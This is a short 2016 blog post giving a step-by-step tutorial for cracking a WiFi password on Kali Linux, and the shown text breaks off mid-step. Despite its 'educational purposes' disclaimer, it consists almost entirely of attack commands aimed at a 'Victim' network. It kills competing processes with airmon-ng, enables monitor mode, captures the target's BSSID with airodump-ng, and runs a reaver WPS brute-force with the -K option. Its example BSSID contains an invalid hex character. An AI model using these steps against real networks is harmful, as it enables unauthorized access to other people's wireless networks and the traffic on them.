Posts

Showing posts from November, 2016

HOW TO HACK WIFI PASSWORD USING KALI LINUX

Image
Dear Friends, Today I’m gonna tell you. How to hack wifi It's very easy do some step which i explained below. Note:- “This video is only for educational purposes. My motive to provide basic information about that”   Step:1- You should have kali 2.0 run kali 2.0 Step:2-  Open Terminal ( CTRL + ALT + T ) Step:3-   Type the following commands on terminal. airmon-ng check   (to check any process is running if yes then type next command) airmon-ng check kill   (to kill all running process) Step:4-  Enable Monitor mode. Now, we use a tool called airmon-ng to create a virtual interface called mon. so type command airmon-ng start wlan0     (to create a monitor mode like:-wlan0mon) Step:5- Type another command  airodump-ng wlan0mon   after some time press    Ctrl+c Step:6-  Copy the BSSID of Victim. And write it on this command. reaver -i wlan0mon -b (BSSID) -vv -K 1 For ex: reaver -i wlan0mon -c 1 -b AB:CG:76:12:C7:10 -vv -K 1 After some time